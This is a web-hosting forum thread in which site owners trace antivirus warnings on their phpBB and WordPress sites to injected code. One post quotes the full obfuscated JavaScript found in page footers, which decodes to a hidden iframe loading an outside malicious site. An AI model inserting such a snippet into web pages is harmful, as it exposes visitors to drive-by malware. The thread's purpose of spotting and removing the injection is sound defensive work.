Scanning My Site on virusses

[Moody 0]

Hi all, I think i have a problem, whenever i open a site on http://forums.xisto.com/no_longer_exists/ (my site) i get a virus waring from norton...is this my computer or my domain? If the domain, can I scan it somehow, so I can delete the virus? It's only when i open a site of that domain.....Thx in advance,Moody

[hazeshow 0]

When I go to your site, all I can see is the Index Directory page, and nothing else, NO virus warnings or anything like that. Perhaps your Norton doesn't like Xisto. GreetingZ

[moonwitch1405241479 0]

Now I hate to admit it, but a friend when visiting my blog (hosted here) had the same issue. But then with trojans....

She also uses Norton...

My blog http://forums.xisto.com/no_longer_exists/

Some more - Klass went to my site, which gives him an ActiveX error (though I at NO point used ActiveX in my site - only HTML - JavaScript and php) and that originated from an IP address other then my own sites IP (here's the WHOIS on the IP) What also worries me is - the 69.50.177.102/x379 seems to be a redirect to xawm.biz :cry:)

The issue in my case seems to be a theme I updated last night, it held a small section of JavaScript code that forced my visitors in IE to download a trojan from a RUssian site. So I urge you to manually check code - in WordPress also the Themes for JavaScript code.

[jipman 0]

Guys (moody, moonwitch), you both seem to share the same problem.

Moody is using a phpBB forum, and moon has problems with her log, that runs on Wordpress..

However, you both (well.. only moody now, moon deleted her problem a while ago). Have a piece of javascript at the bottom of your site.

<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);</script></body>

When you decode it, you can see that it's actually a hidden frame which links to a attempts to open a site http://forums.xisto.com/no_longer_exists/

Which, in return attempts to open these sites:

http://forums.xisto.com/no_longer_exists/

http://forums.xisto.com/no_longer_exists/

The first one is some kinda of counter, which can be ignored

The second one attempts to load a certain applet, which I can't be bothered to checkout what it exactly does, probably something malicious :S

To make a long story short. This is what could've happened.

1. Both of you suffered from an automated exploit batch which put the code there.
2. You guys got your site hacked, because someone was bored
3. I think this is it, Xisto has gotten hacked :|.

I come to this conclusion because both Moody and Moonwitch use a quite common piece of software (phpbb, wordpress), and they have the same problem at around the same time. And that there is some kind of script around here somewhere that changes stuff (cronjob maybe?).

Anyway, everyone, if you use any kind of common software, forums/msg's boards/blogs etc. etc..

Please check your site for above code and remove it. And report it ofcourse.

[Neverseen 0]

I've got a phpBB forum on my website as well.. but never noticed any problems with antivirus e.t.c... hopefully it'll never happen

[hazeshow 0]

I once installed a test forum here on Xisto, but FORTUNATELY I can't find any of the malicious source code in my pages. I hope that nobody here on Xisto is being hacked.

[Moody 0]

Oke guys, i can say, my problem is also a trojan. Norton says that, but where is that code, i mean in wich file, or do i have to check all my files? Pls help, cus i think my visitors don't like this.

[Moody 0]

Oke guys, good news, i overwrited the templates subsilver folder and i dno't get the error from norton anymore, so i guess the trojan is away, but ofcourse i want to change my password now and it won't work i get this:There was an error manipulating the password file.Can you help me?

[moonwitch1405241479 0]

In my case - I had to check the source code of my blog. Apparently the code got added to every footer.php file in all my skins for WordPress. And I deleted the code last night - to return and find the code came back

Password changes, moody, is per request.
http://forums.xisto.com/topic/101-forum/

[4dsystems 0]

I think Cpanel comes with an Antivirus! You can scan your system with that. I haven't been hosted yet but my earlier host had an antivirus after a virus outbreak affecting all my php files ! Some 'iframe problem stuff!!!